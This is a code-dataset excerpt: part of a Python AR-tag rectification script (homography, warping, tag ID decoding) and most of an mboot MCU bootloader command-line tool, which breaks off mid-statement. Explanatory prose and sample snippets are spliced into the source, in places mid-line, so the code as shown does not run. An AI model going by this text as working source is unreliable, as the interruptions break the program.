[-x4,-y4,-1,0,0,0,x4*xp4,y4*xp4,xp4],[0,0,0,-x4,-y4,-1,x4*yp4,y4*yp4,yp4]], dtype=np.float32)\n \n A_trans = A.transpose()\n A_prod = np.dot(A_trans,A)\n w,v = np.linalg.eig(A_prod)\n H = v[:,-1]\n H = np.reshape(H,(3,3))\n H = H/H[2,2]\n if abs(np.linalg.det(H)) < 0.0001:\n return H \n H = np.linalg.inv(H)\n H = H/H[2,2]\n return H\n\ndef getPerspectiveTransform(img, H, shape):\n\n Hinv = np.linalg.inv(H)\n Hinv = Hinv/Hinv[2,2]\n rect_img = np.zeros((shape[0], shape[1], 1))\n img_ = img.astype(np.float32)\n counter=0\n for i in range(shape[0]): # x? 
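Despite its name, find_svd above takes an eigenvector of A.T @ A via np.linalg.eig; the textbook DLT instead uses the smallest right singular vector of A itself, which avoids squaring the condition number. A hedged sketch of that variant, returning the src-to-dst homography directly without the inversion step used above:

```python
import numpy as np

def homography_dlt(src, dst):
    # build the standard 2-rows-per-correspondence DLT system
    rows = []
    for (x, y), (xp, yp) in zip(src, dst):
        rows.append([-x, -y, -1, 0, 0, 0, x * xp, y * xp, xp])
        rows.append([0, 0, 0, -x, -y, -1, x * yp, y * yp, yp])
    A = np.array(rows, dtype=np.float64)
    _, _, vt = np.linalg.svd(A)
    H = vt[-1].reshape(3, 3)     # right singular vector of smallest singular value
    return H / H[2, 2]
```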
to change\n for j in range(shape[1]): #y?\n [x, y, z] = np.dot(Hinv, np.transpose([j, i, 1]))\n x = x/z\n y = y/z\n counter+=1\n if (type(x) != np.float64) or (type(y)!= np.float64):\n # print(1)\n continue\n if (x < 1919 and y < 1079 and x >= 0 and y >= 0):\n rect_img[i,j] = (img_[int(np.floor(y)),int(np.floor(x))] + img_[int(np.floor(y)),int(np.ceil(x))]\n + img_[int(np.ceil(y)), int(np.ceil(x))]+ img_[int(np.ceil(y)) , int(np.floor(x))])/4.0\n \n return rect_img\n\ndef getPerspectiveTransform_Lena(img, img_lena, H, shape):\n\n Hinv = np.linalg.inv(H)\n Hinv = Hinv/Hinv[2,2]\n img_ = np.zeros((img.shape[0], img.shape[1], 4))\n img_[:,:,0:3] = img\n \n for i in range(shape[0]): # x? to change\n for j in range(shape[1]): #y?\n [x, y, z] = np.dot(Hinv, np.transpose([j, i, 1]))\n x = x/z\n y = y/z\n #print(x, y)\n index_x = [int(np.floor(y)), int(np.floor(y)), int(np.ceil(y)), int(np.ceil(y))]\n index_y = [int(np.floor(x)), int(np.floor(x)), int(np.ceil(x)), int(np.ceil(x))]\n if(x < 1920 and y < 1080 and x>=0 and y>=0):\n img_[int(np.floor(y)), int(np.floor(x)), 0:3] = (img_[int(np.floor(y)), int(np.floor(x)), 0:3]*img_[int(np.floor(y)), int(np.floor(x)), 3] \n + img_lena[i,j,0:3])/(img_[int(np.floor(y)), int(np.floor(x)), 3] + 1)\n img_[int(np.floor(y)), int(np.floor(x)), 3] += 1\n \n return img_[:,:,0:3].astype(np.uint8) \n \ndef orient_img(img):\n\n scale = 5\n scaleEnd = -3\n num_rot = 0\n img_ = np.asarray(img[scale:scaleEnd, scale:scaleEnd]).astype(np.int32)\n inds = np.where(img_>= np.max(img_) - 15)\n xmin = np.min(inds[0])+scale\n xmax = np.max(inds[0])+scale\n ymin = np.min(inds[1])+scale\n ymax = np.max(inds[1])+scale\n topLeft = [xmin, ymin]\n topRight = [xmin, ymax]\n bottomLeft = [xmax, ymin]\n bottomRight = [xmax, ymax]\n keypts = np.array([np.add(bottomRight, 0.1*np.add(topLeft, np.multiply(-1,bottomRight))), np.add(topRight,0.1*np.add(bottomLeft,np.multiply(-1,topRight))) ,\n np.add(topLeft,0.1*np.add(bottomRight,np.multiply(-1,topLeft))),np.add(bottomLeft, 0.1*np.add(topRight, np.multiply(-1,bottomLeft))) ])\n for i in range(len(keypts)):\n if img[int(keypts[i,0])][int(keypts[i,1])] >=230 :\n for k in range(i):\n img = cv2.rotate(img, cv2.ROTATE_90_CLOCKWISE)\n num_rot = i \n\n return num_rot, img \n \n\ndef find_id(img):\n\n sizex = img.shape[0]\n sizey = img.shape[1]\n scale = 5\n scaleEnd = -3\n img_ = np.asarray(img[scale:scaleEnd, scale:scaleEnd]).astype(np.int32)\n inds = np.where(img_>= np.max(img_) - 15)\n xmin = np.min(inds[0])+scale\n xmax = np.max(inds[0])+scale\n ymin = np.min(inds[1])+scale\n ymax = np.max(inds[1])+scale\n topLeft = [xmin, ymin]\n topRight = [xmin, ymax]\n bottomLeft = [xmax, ymin]\n bottomRight = [xmax, ymax]\n keypts = np.array([np.add(bottomLeft, 0.375*np.add(topRight, np.multiply(-1,bottomLeft))),np.add(bottomRight, 0.375*np.add(topLeft, np.multiply(-1,bottomRight))), \n np.add(topRight,0.375*np.add(bottomLeft,np.multiply(-1,topRight))),np.add(topLeft,0.375*np.add(bottomRight,np.multiply(-1,topLeft)))])\n id = 0\n cv2.rectangle(img,(ymin,xmin),(ymax,xmax),(0,255,0),thickness=1)\n for i in range(len(keypts)):\n if(img[int(keypts[i][0])][int(keypts[i][1])] >245):\n id = (id << 1) | int('00000001', 2)\n else:\n id = (id << 1) | int('00000000', 2)\n return id\n\ndef draw_cubes(img, corners, imgPts):\n \n for i in range(corners.shape[0]): \n cv2.line(img, tuple(corners[i%4]),tuple(corners[(i+1)%4]),(0,255,255),3)\n cv2.line(img, tuple(imgPts[0:2, i%4].astype(np.int32)),tuple(imgPts[0:2, (i+1)%4].astype(np.int32)),(0,255,255),3)\n cv2.line(img, 
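The per-pixel loops above implement inverse warping with a hand-rolled four-neighbour average; OpenCV's built-ins perform the same resampling in one call. A hedged equivalent of rectify() (the size of 128 matches the hard-coded target above):

```python
import cv2
import numpy as np

def rectify_cv(img_gray, corners, size=128):
    dst = np.array([[0, 0], [size, 0], [size, size], [0, size]], dtype=np.float32)
    H = cv2.getPerspectiveTransform(np.asarray(corners, dtype=np.float32), dst)
    return cv2.warpPerspective(img_gray, H, (size, size))
```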
tuple(corners[i%4]),tuple([int(imgPts[0,i%4]),int(imgPts[1,i%4])]),(255,0,0),3) \n\ndef in_hull(p, hull):\n\n if not isinstance(hull,Delaunay):\n hull = Delaunay(hull)\n res = hull.find_simplex(p)>=0\n # print(res)\n return res\n \nif __name__==\"__main__\":\n \n index = [44, 250, 399]\n corners = [\n np.array([[1145, 567], [1074, 598], [1033, 537], [1104, 508]], dtype=np.float32),\n np.array([[1099, 625], [1037, 642], [1004, 582], [1067, 566]], dtype=np.float32),\n np.array([[1158, 540], [1134, 597], [1057, 558], [1086, 498]], dtype=np.float32)\n ]\n\n for i in range(len(index)):\n img = cv2.imread(\"VideoFrames/vid\"+ str(index[i])+\".jpg\")\n imgCorner = corners[i]\n rect_img = rectify(img, imgCorner)\n cv2.imshow(\"rectified image\", rect_img)\n oriented_image = orient_img(rect_img)\n cv2.imshow(\"oriented image\", oriented_image)\n id = find_id(oriented_image)\n print (id)\n cv2.waitKey(0)\n ","sub_path":"rectify.py","file_name":"rectify.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"607116402","text":"import sys\nimport argparse\nimport re as _re\nimport logging\n\nfrom . import mboot\nfrom .tool import check_method_arg_number, convert_arg_to_int, check_key, check_int, hexdump, read_file\nfrom .enums import PropertyTag\nfrom .constant import Interface\nfrom .memorytool import MemoryBlock\nfrom .peripheral import parse_peripheral\nfrom .exception import McuBootGenericError\nfrom . import global_error_handler\nfrom . import __version__\n\n# Use when debugging the argprase library, because the command has not been received \n# at this time to set the log level, so there will be no more detailed details.\n# logging.basicConfig(level=logging.DEBUG)\n\ndef parse_args(parser, subparsers, command=None):\n if command is None:\n command = sys.argv[1:]\n # Divide argv by commands\n split_argv = [[]]\n\n if '-o' in command or '--origin' in command: # origin interface\n split_argv[-1].extend(command)\n else:\n for c in command:\n if c in subparsers.choices:\n split_argv.append([c])\n else:\n split_argv[-1].append(c)\n # print(split_argv[-1])\n # If you only enter the tool name, it will output its help by default.\n if split_argv == [[]]:\n split_argv[0].append(\"-h\")\n # Initialize namespace\n args = argparse.Namespace()\n # Set command name, such as cmd1, cmd2..\n for c in subparsers.choices:\n setattr(args, c, None)\n # Parse each command\n parser.parse_args(split_argv[0], namespace=args) # Without command\n # print(args)\n # print(split_argv)\n for argv in split_argv[1:]: # Each Subcommands\n n = argparse.Namespace()\n setattr(args, argv[0], n)\n # print(args)\n # Prevents the addition of commands defined by the parent parser\n parser._parse_known_args(list(argv), namespace=n)\n return args\n\ndef info(mb, memory_id=0, exconf=None):\n nfo = mb.get_mcu_info()\n # Print MCUBoot MCU Info\n for key, value in nfo.items():\n m = \" {}:\".format(key)\n if isinstance(value, list):\n m += \"\".join([\"\\n - {}\".format(s) for s in value])\n else:\n m += \"\\n = {}\".format(value)\n print(m)\n\n if memory_id:\n if exconf:\n mb.setup_external_memory(memory_id, exconf)\n info = mb.get_exmemory_info(memory_id)\n for key, value in info.items():\n m = \" {}:\".format(key)\n if isinstance(value, list):\n m += \"\".join([\"\\n - {}\".format(s) for s in value])\n else:\n m += \"\\n = {}\".format(value)\n print(m)\n\ndef write(mb, address, filename, memory_id=0, offset=0, no_erase=False, exconf=None):\n 
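in_hull above reduces point-in-polygon testing to a Delaunay simplex lookup; a quick self-contained check of that idea:

```python
import numpy as np
from scipy.spatial import Delaunay

square = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])
pts = np.array([[0.5, 0.5], [2.0, 2.0]])
# find_simplex returns -1 for points outside any triangle of the hull
print(Delaunay(square).find_simplex(pts) >= 0)   # [ True False]
```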
do_erase = not no_erase\n mb.get_memory_range()\n data, start_address = read_file(filename, address)\n length = len(data) - offset\n data = data[offset:]\n block = MemoryBlock(start_address, None, length)\n if memory_id:\n if exconf:\n mb.setup_external_memory(memory_id, exconf)\n # Some device do not support EXTERNAL_MEMORY_ATTRIBUTES Property, so external memory will not check memory range\n\n if do_erase:\n mb.flash_erase_region(start_address, length, memory_id)\n else:\n if mb.is_in_flash(block):\n if do_erase: # erase first if block in the flash area\n mb.flash_erase_region(block.start, block.length)\n elif mb.is_in_memory(block):\n pass\n else:\n raise McuBootGenericError('MemoryRangeInvalid, please check the address range.')\n start = mb.get_property(PropertyTag.RAM_START_ADDRESS)\n mb.write_memory(start_address, data, memory_id)\n\ndef read(mb, address, length, filename=None, memory_id=0, compress=False, exconf=None):\n mb.get_memory_range()\n block = MemoryBlock(address, None, length)\n if memory_id:\n if exconf:\n mb.setup_external_memory(memory_id, exconf)\n # Some device do not support EXTERNAL_MEMORY_ATTRIBUTES Property, so external memory will not check memory range\n else:\n if not (mb.is_in_flash(block) or mb.is_in_memory(block)):\n raise McuBootGenericError('MemoryRangeInvalid, please check the address range.')\n data = mb.read_memory(address, length, filename, memory_id)\n print('\\n', hexdump(data, address, compress))\n\n# def handle_exception(func):\n# def decorate(func):\n# try:\n# func()\n# except McuBootGenericError as e:\n# err_msg = '\\n' + traceback.format_exc() if ctx.obj['DEBUG'] else ' ERROR: {}'.format(str(e))\n\ndef fill(mb, address, byte_count, pattern, unit, no_erase=False):\n do_erase = not no_erase\n mb.get_memory_range()\n block = MemoryBlock(address, None, byte_count*8)\n if mb.is_in_flash(block):\n if do_erase:\n mb.flash_erase_region(block.start, block.length)\n elif mb.is_in_memory(block):\n pass\n else:\n raise McuBootGenericError('MemoryRangeInvalid, please check the address range.')\n mb.fill_memory(address, byte_count, pattern, unit)\n\ndef erase(mb, address, length, memory_id=0, erase_all = False, exconf=None):\n if memory_id and exconf:\n mb.setup_external_memory(memory_id, exconf)\n if erase_all:\n # Get available commands\n commands = mb.get_property(mboot.PropertyTag.AVAILABLE_COMMANDS)\n # Call KBoot flash erase all function\n if mboot.is_command_available(mboot.CommandTag.FLASH_ERASE_ALL_UNSECURE, commands) and memory_id == 0:\n mb.flash_erase_all_unsecure()\n elif mboot.is_command_available(mboot.CommandTag.FLASH_ERASE_ALL, commands):\n mb.flash_erase_all(memory_id)\n else:\n raise McuBootGenericError('Not Supported \"flash_erase_all_unsecure/flash_erase_all\" Command')\n else:\n # Call KBoot flash erase region function\n mb.flash_erase_region(address, length, memory_id)\n\ndef unlock(mb, key=None):\n if key is None:\n # Call KBoot flash erase all and unsecure function\n mb.flash_erase_all_unsecure()\n else:\n # Call KBoot flash security disable function\n mb.flash_security_disable(key)\n\nclass MBootHelpFormatter(argparse.ArgumentDefaultsHelpFormatter):\n def __init__(self, prog, *args, **kwargs):\n super(MBootHelpFormatter, self).__init__(prog, max_help_position=35, width=85, *args, **kwargs)\n\n def add_usage(self, usage, actions, groups, prefix=None):\n if prefix is None:\n prefix = 'Usage: '\n return super(MBootHelpFormatter, self).add_usage(\n usage, actions, groups, prefix)\n\n def _format_args(self, action, default_metavar):\n 
get_metavar = self._metavar_formatter(action, default_metavar)\n if action.nargs is None:\n result = '%s' % get_metavar(1)\n elif action.nargs == argparse.OPTIONAL:\n result = '[%s]' % get_metavar(1)\n elif action.nargs == argparse.ZERO_OR_MORE:\n if action.metavar is None:\n # result = '[%s [%s ...]]' % get_metavar(2)\n # When metavar is not set, use '...' for usage\n result = '...'\n else:\n if isinstance(action.metavar, str):\n metavar_len = 1\n else:\n metavar_len = len(action.metavar)\n if metavar_len == 1:\n result = '[%s]' % get_metavar(1)\n elif metavar_len > 1:\n f_string = ' [%s]' * (metavar_len - 1)\n f_string = '[%s{}]'.format(f_string)\n result = f_string % get_metavar(metavar_len)\n else:\n raise ValueError('The \"metavar\" attribute cannot provide an empty tuple.')\n elif action.nargs == argparse.ONE_OR_MORE:\n if action.metavar is None:\n # When metavar is not set, use default value for usage\n result = '[%s [%s ...]]' % get_metavar(2)\n else:\n if isinstance(action.metavar, str):\n metavar_len = 1\n else:\n metavar_len = len(action.metavar)\n if metavar_len == 1:\n result = '[%s]' % get_metavar(1)\n elif metavar_len > 1:\n f_string = ' [%s]' * (metavar_len - 1)\n f_string = '[%s{}]'.format(f_string)\n result = f_string % get_metavar(metavar_len)\n else:\n raise ValueError('The \"metavar\" attribute cannot provide an empty tuple.')\n elif action.nargs == argparse.REMAINDER:\n result = '...'\n elif action.nargs == argparse.PARSER:\n result = '%s ...' % get_metavar(1)\n else:\n formats = ['%s' for _ in range(action.nargs)]\n result = ' '.join(formats) % get_metavar(action.nargs)\n return result\n\n # Abbreviate shorthand help\n def _format_action_invocation(self, action):\n if not action.option_strings:\n default = self._get_default_metavar_for_positional(action)\n metavar, = self._metavar_formatter(action, default)(1)\n return metavar\n\n else:\n parts = []\n\n # if the Optional doesn't take a value, format is:\n # -s, --long\n if action.nargs == 0:\n parts.extend(action.option_strings)\n\n # if the Optional takes a value, format is:\n # -s ARGS, --long ARGS\n else:\n default = self._get_default_metavar_for_optional(action)\n args_string = self._format_args(action, default)\n parts.extend(action.option_strings[:-1])\n parts.append('%s %s' % (action.option_strings[-1], args_string))\n # for option_string in action.option_strings:\n # parts.append('%s %s' % (option_string, args_string))\n\n return ', '.join(parts)\n\nclass MBootSubHelpFormatter(MBootHelpFormatter):\n def _format_usage(self, usage, actions, groups, prefix):\n if prefix is None:\n prefix = _('usage: ')\n\n # if usage is specified, use that\n if usage is not None:\n usage = usage % dict(prog=self._prog)\n\n # if no optionals or positionals are available, usage is just prog\n elif usage is None and not actions:\n usage = '%(prog)s' % dict(prog=self._prog)\n\n # if optionals and positionals are available, calculate usage\n elif usage is None:\n prog = '%(prog)s' % dict(prog=self._prog)\n\n # split optionals from positionals\n optionals = []\n positionals = []\n for action in actions:\n if action.option_strings:\n optionals.append(action)\n else:\n positionals.append(action)\n\n # build full usage string\n format = self._format_actions_usage\n # action_usage = format(optionals + positionals, groups)\n # usage = ' '.join([s for s in [prog, action_usage] if s])\n\n # break usage into wrappable parts\n part_regexp = (\n r'\\(.*?\\)+(?=\\s|$)|'\n r'\\[.*?\\]+(?=\\s|$)|'\n r'\\S+'\n )\n opt_usage = format(optionals, 
groups)\n pos_usage = format(positionals, groups)\n opt_parts = _re.findall(part_regexp, opt_usage)\n pos_parts = _re.findall(part_regexp, pos_usage)\n assert ' '.join(opt_parts) == opt_usage\n assert ' '.join(pos_parts) == pos_usage\n usage = ' '.join([v for v in [prog, pos_usage, opt_usage] if v])\n\n # wrap the usage parts if it's too long\n text_width = self._width - self._current_indent\n if len(prefix) + len(usage) > text_width:\n # helper for wrapping lines\n def get_lines(parts, indent, prefix=None):\n lines = []\n line = []\n if prefix is not None:\n line_len = len(prefix) - 1\n else:\n line_len = len(indent) - 1\n for part in parts:\n if line_len + 1 + len(part) > text_width and line:\n lines.append(indent + ' '.join(line))\n line = []\n line_len = len(indent) - 1\n line.append(part)\n line_len += len(part) + 1\n if line:\n lines.append(indent + ' '.join(line))\n if prefix is not None:\n lines[0] = lines[0][len(indent):]\n return lines\n\n # if prog is short, follow it with optionals or positionals\n if len(prefix) + len(prog) <= 0.75 * text_width:\n indent = ' ' * (len(prefix) + len(prog) + 1)\n if pos_parts and opt_parts:\n lines = get_lines([prog] + pos_parts, indent, prefix)\n lines.extend(get_lines(opt_parts, indent))\n elif opt_parts:\n lines = get_lines(opt_parts, indent, prefix)\n elif pos_parts:\n lines = get_lines(pos_parts, indent, prefix)\n else:\n lines = [prog]\n\n # if prog is long, put it on its own line\n else:\n indent = ' ' * len(prefix)\n parts = pos_parts + opt_parts\n lines = get_lines(parts, indent)\n if len(lines) > 1:\n lines = []\n lines.extend(get_lines(pos_parts, indent))\n lines.extend(get_lines(opt_parts, indent))\n lines = [prog] + lines\n # join lines into usage\n usage = '\\n'.join(lines)\n\n # prefix with 'usage:'\n return '%s%s\\n\\n' % (prefix, usage)\n\nclass FixArgValue(argparse.Action):\n \"\"\"Fix incorrect allocation of values ​​due to resolution reasons\n :param check_arg: The name of the arg. 
to be checked, its type must be different from the current arg.\n \"\"\"\n def __init__(self,\n option_strings,\n dest,\n nargs=None,\n const=None,\n default=None,\n type=None,\n choices=None,\n required=False,\n help=None,\n metavar=None,\n check_arg=None): # Add 'check_arg' arg\n argparse.Action.__init__(self,\n option_strings=option_strings,\n dest=dest,\n nargs=nargs,\n const=const,\n default=default,\n type=type,\n choices=choices,\n required=required,\n help=help,\n metavar=metavar)\n self.check_arg = check_arg\n # print('Initializing CustomAction')\n # for name, value in sorted(locals().items()):\n # if name == 'self' or value is None:\n # continue\n # print('init value: {} = {!r}'.format(name, value))\n # return\n def __call__(self, parser, namespace, values, option_string=None):\n # print('- dest = {}'.format(self.dest))\n # print('- values = {!r}'.format(values))\n # print('- namespace = {}'.format(namespace))\n # print('- parser = {}'.format(parser))\n # print('- option_string = {!r}'.format(option_string))\n # import pprint\n # pprint.pprint('{}'.format(parser.__dict__['_registries']))\n # for item in parser.__dict__['_optionals']:\n # pprint.pprint(item)\n\n #parser.__dict__._StoreAction.dest\n if values:\n '''Normal assignment if the current value exists\n Type conversion will be performed before accon, \n so there is no need to perform type conversion again.'''\n setattr(namespace, self.dest, values)\n else:\n # Get the value of the parameter to check\n check_arg_value = getattr(namespace, self.check_arg, None)\n\n if self.type is None:\n self.type = str\n try:\n # Use the type checker of this parameter to check the value of `check_arg`.\n if isinstance(check_arg_value, (list, tuple)):\n [self.type(value) for value in check_arg_value]\n value = check_arg_value\n else:\n value = self.type(check_arg_value)\n except Exception:\n # Error, give up fix, use default value\n setattr(namespace, self.dest, self.default)\n else:\n # Deprive the value from checked parameters\n setattr(namespace, self.dest, value)\n # Reassign the checked parameter with its default value\n for item in parser.__dict__['_actions']:\n if item.dest == self.check_arg:\n setattr(namespace, self.check_arg, item.default)\n break\n\n@global_error_handler\ndef main():\n parser = argparse.ArgumentParser(prog='mboot', description='A python mboot with user interface.', \n formatter_class=MBootHelpFormatter, add_help=False)#, usage='%(prog)s [peripheral option] [other options] []')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-u', '--usb', nargs='?', const=[], default=None, \n help='Use usb peripheral, such as \"-u VIDPID\", \"-u\"', metavar='vid,pid')\n group.add_argument('-p', '--uart', nargs='*', help='Use uart peripheral, '\n 'such as \"-p PORT SPEED\", \"-p PORT\", \"-p SPEED\", \"-p\"', metavar=('port', 'speed'))\n group.add_argument('-s', '--spi', nargs='*', help='Use spi peripheral, '\n 'such as \"-s VIDPID SPEED\", \"-s VIDPID\", \"-s SPEED\", \"-s\"', metavar=('vid,pid', 'speed'))\n group.add_argument('-i', '--i2c', nargs='*', help='Use i2c peripheral, '\n 'such as \"-i VIDPID SPEED\", \"-i VIDPID\", \"-i SPEED\", \"-i\"', metavar=('vid,pid', 'speed'))\n parser.add_argument('--select_device', help='When inserting two devices with the same vid, pid, '\n 'manually select the device, so that the device selection prompt will not pop up. '\n 'For \"usb\" devices, its value should be the device id under windows, and a pair of values ​​like \"BUS, ADDRESS\" under linux. 
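FixArgValue is a custom argparse.Action that re-assigns a value argparse bound to the wrong positional, then restores the checked argument's default. For readers unfamiliar with the hook it overrides, a minimal self-contained Action for comparison (unrelated to mboot itself):

```python
import argparse

class StoreUpper(argparse.Action):
    # __call__ receives the parsed value and decides what lands on the namespace
    def __call__(self, parser, namespace, values, option_string=None):
        setattr(namespace, self.dest, values.upper())

parser = argparse.ArgumentParser()
parser.add_argument("name", action=StoreUpper)
print(parser.parse_args(["mboot"]).name)   # MBOOT
```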
')\n parser.add_argument('--ftdi_index', type=check_int, help='When inserting multiple SPI, I2C devices with the same vid, pid,'\n 'its value should be the value of the device path/locate in the order in which they are arranged by the port.')\n\n parser.add_argument('-t', '--timeout', type=int, help='Maximum wait time(Unit: s) for the change of the transceiver status in a single atomic operation, '\n 'it is only valid for the \"flash-erase-*\" command and only changes the timeout of the ack after sending the packet, '\n 'which is invalid for the timeout in read phase.')\n # parser.add_argument('-d', '--debug', action='store_true', help='Debug level: 0-off, 1-info, 2-debug')\n parser.add_argument('-d', '--debug', nargs='?', type=int, choices=range(0, 3), const=1, default=0, help='Debug level: 0-off, 1-info, 2-debug')\n parser.add_argument('-o', '--origin', nargs=argparse.REMAINDER, help='MCU Boot Original Interface')\n parser.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s {}'.format(__version__), help=\"Show program's version number and exit.\")\n # requiredNamed = parser.add_argument_group('required named arguments')\n # requiredNamed.add_argument('-info', action='store_true', help='Get MCU info (mboot properties)')\n\n subparsers = parser.add_subparsers(title='MCU Boot User Interface', prog='mboot [options]')\n \n parser_info = subparsers.add_parser('info', help='Get MCU info (mboot properties)', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_info.add_argument('memory_id', nargs='?', type=check_int, default=0, choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), \n help='External memory id, Display external memory information if it is already executed configure-memory', metavar='memory_id')\n parser_info.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n 'such as \"fill_config_address config_word1 [config_word2 [...]]\", only the first time you need to set')\n parser_info.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_write = subparsers.add_parser('write', help='Write data into MCU memory', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_write.add_argument('address', type=check_int, nargs='?', help='Start address, '\n 'the arg can be omitted if file end with \".srec\", \".s19\", \".hex\", \".ihex\" that contains the address')\n parser_write.add_argument('filename', help='File to be written')\n parser_write.add_argument('memory_id', nargs='?', type=check_int, default=0, choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), \n help='External memory id', metavar='memory_id')\n parser_write.add_argument('-o', '--offset', type=check_int, default=0, help='File offset address')\n parser_write.add_argument('--no_erase', action='store_true', help='Do not automatically erase before writing.')\n parser_write.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n 'such as \"fill_config_address config_word1 [config_word2 [...]]\", only the first time you need to set')\n parser_write.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_read = subparsers.add_parser('read', help='Read data from MCU memory', 
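check_int is imported from .tool and not shown in this file; since it is used as an argparse type= converter for addresses that may be written in hex, a plausible, loudly hypothetical stand-in looks like this:

```python
import argparse

def check_int_sketch(value):
    # hypothetical stand-in for tool.check_int: base 0 honours 0x/0o/0b prefixes
    try:
        return int(value, 0)
    except ValueError:
        raise argparse.ArgumentTypeError("invalid integer value: %r" % value)
```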
formatter_class=MBootSubHelpFormatter, add_help=False)\n    parser_read.add_argument('address', type=check_int, help='Start address')\n    parser_read.add_argument('length', type=check_int, default=0x100, help='Read data length')\n    parser_read.add_argument('filename', nargs='?', help='File to save the read data into')\n    parser_read.add_argument('memory_id', nargs='?', type=check_int, action=FixArgValue, check_arg='filename', default=0, \n        choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), help='External memory id', metavar='memory_id')\n    parser_read.add_argument('-c', '--compress', action='store_true', help='Compress dump output.')\n    parser_read.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n        'such as \"fill_config_address config_word1 [config_word2 [...]]\"; it only needs to be set the first time')\n    parser_read.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n    parser_fill = subparsers.add_parser('fill', help='Fill MCU memory with specified pattern', formatter_class=MBootSubHelpFormatter, add_help=False)\n    parser_fill.add_argument('address', type=check_int, help='Start address')\n    parser_fill.add_argument('byte_count', type=check_int, help='Total length of padding, count of bytes')\n    parser_fill.add_argument('pattern', type=check_int, help='The pattern used for padding, e.g. 0xFFFFFFFF')\n    parser_fill.add_argument('unit', nargs='?', choices=['word', 'short', 'byte'], default='word', \n        help='Process pattern according to word, short (half-word), byte')\n    parser_fill.add_argument('--no_erase', action='store_true', help='Do not automatically erase before writing.')\n    parser_fill.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n    parser_erase = subparsers.add_parser('erase', help='Erase MCU memory', formatter_class=MBootSubHelpFormatter, add_help=False)\n    parser_erase.add_argument('address', nargs='?', type=check_int, help='Start address')\n    parser_erase.add_argument('length', nargs='?', type=check_int, default=0x100, help='Erase data length')\n    parser_erase.add_argument('memory_id', nargs='?', type=check_int, default=0, choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), \n        help='External memory id', metavar='memory_id')\n    parser_erase.add_argument('-a', '--all', action='store_true', help='Erase complete MCU memory')\n    parser_erase.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n        'such as \"fill_config_address config_word1 [config_word2 [...]]\"; it only needs to be set the first time')\n    parser_erase.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n    parser_unlock = subparsers.add_parser('unlock', help='Unlock MCU', formatter_class=MBootSubHelpFormatter, add_help=False)\n    parser_unlock.add_argument('-k', '--key', type=check_key, help='Use backdoor key as ASCII = S:123...8 or HEX = X:010203...08')\n    parser_unlock.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n    parser_reset = subparsers.add_parser('reset', help='Reset MCU', formatter_class=MBootSubHelpFormatter, add_help=False)\n    parser_reset.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n    cmd = parse_args(parser, subparsers)\n    log_level = 
[logging.WARNING, logging.INFO, logging.DEBUG]\n if cmd.origin and cmd.debug < 2:\n cmd.debug += 1\n logging.basicConfig(level=log_level[cmd.debug])\n\n # print(cmd)\n\n mb = mboot.McuBoot()\n mb.cli_mode = True # this is cli mode\n\n # Added the feature to display the original interface help\n if cmd.origin and ('-h' in cmd.origin or '--help' in cmd.origin):\n attr = cmd.origin[0].replace('-', '_')\n func = getattr(mb, attr, None)\n if func:\n print('\\n '.join(line.strip() for line in func.__doc__.split('\\n ')))\n sys.exit(0) # Normal exit\n else:\n raise McuBootGenericError('invalid command:{}'.format(cmd.origin[0]))\n\n if cmd.usb is not None:\n if cmd.select_device:\n vid_pid = parse_peripheral(Interface.USB.name, cmd.usb, not cmd.select_device)[0]\n mb.open_usb(vid_pid, cmd.select_device)\n else:\n config = parse_peripheral(Interface.USB.name, cmd.usb)[0]\n mb.open_usb(config[0:2], config[-1])\n # device = RawHID.enumerate(*vid_pid)[0]\n # mb.open_usb(device)\n elif cmd.uart is not None:\n port, baudrate = parse_peripheral(Interface.UART.name, cmd.uart)\n mb.open_uart(port, baudrate)\n elif cmd.spi is not None:\n if cmd.ftdi_index:\n vid_pid, speed = parse_peripheral(Interface.SPI.name, cmd.spi, False)\n mb.open_spi(vid_pid, cmd.ftdi_index, speed, 0)\n else:\n config, speed = parse_peripheral(Interface.SPI.name, cmd.spi)\n vid_pid = config[0:2]\n index = config[-1]\n mb.open_spi(vid_pid, index, freq=speed, mode=0)\n elif cmd.i2c is not None:\n if cmd.ftdi_index:\n vid_pid, speed = parse_peripheral(Interface.I2C.name, cmd.i2c, False)\n mb.open_i2c(vid_pid, cmd.ftdi_index, speed)\n else:\n config, speed = parse_peripheral(Interface.I2C.name, cmd.i2c)\n vid_pid = config[0:2]\n index = config[-1]\n mb.open_i2c(vid_pid, index, freq=speed)\n else:\n raise McuBootGenericError('You need to choose a peripheral for communication.')\n\n # mb.get_memory_range()\n\n if cmd.info:\n args = cmd.info\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n info(mb, args.memory_id, args.exconf)\n\n if cmd.write:\n args = cmd.write\n if getattr(args, '_unrecognized_args', None):\n 